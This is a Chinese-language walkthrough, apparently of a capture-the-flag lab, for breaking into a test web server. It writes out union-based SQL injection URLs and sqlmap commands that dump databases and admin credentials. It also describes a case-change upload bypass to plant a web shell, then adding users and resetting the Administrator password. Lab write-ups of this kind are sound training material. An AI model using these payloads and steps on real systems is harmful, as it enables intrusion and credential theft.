DCN-WEB 滲透測試
阿新 • • 發佈:2021-12-17
DCN-WEB 滲透測試
官方推薦使用他們提供的攻擊機來做題,但是那玩意太卡了.....
1
隨便點一個就是注入點
正常情況下
存在注入情況下
經過and 1=1
測試後發現這是一個數字型的注入點,剩下就是手注或者直接跑sqlmap了
先手注入
回顯位2,3
資料庫名web
http://172.16.1.102/about.php?id=-1 union select 1,user(),(select group_concat(schema_name) from information_schema.schemata),4 --+
http://172.16.1.102/about.php?id=-1 union select 1,user(),(select group_concat(table_name) from information_schema.tables where table_schema='flag1'),4 --+
http://172.16.1.102/about.php?id=-1 union select 1,user(),(select group_concat(column_name) from information_schema.columns where table_name='key1') ,4 --+
http://172.16.1.102/about.php?id=-1 union select 1,user(),(select group_concat(flag) from flag1.key1),4 --+
sql注入跨庫參考指南:https://blog.csdn.net/lemeifei/article/details/121347468
法二:
python sqlmap.py -u http://172.16.1.102/about.php?id=1 -D flag1 -T key1 --dump
2
檢視頁面原始碼給出後臺路徑
藉助上一題的注入,直接獲得賬號密碼
>python sqlmap.py -u http://172.16.1.102/about.php?id=1 -D web -T admin --dump
完成登陸
3
此路徑上存在上傳點
http://172.16.1.102/manage/index.php
直接就大小寫繞過了,但是不允許上傳jpg就離譜,接下來就可以上菜刀,直接拿flag。
http://172.16.1.102/upload/month_2112/202112170146193774.Php
4
新增使用者
遠端登陸檢視,這樣子看不flag,可能使用者不用啟動檔案也不同
改重置administrator的密碼,登陸administrator使用者檢視一下
C:\Documents and Settings\Administrator\「開始」選單\程式\啟動
進去直接檔案形式開啟就可以獲得flag (雖然它提示是損壞了,其實就是改了個字尾名)
5
開啟登錄檔regedit,找到這個檔案,發現打不開??
因為當前使用者是管理員就直接修改一下許可權
然後關掉,重新開啟一次
就這個使用者
完了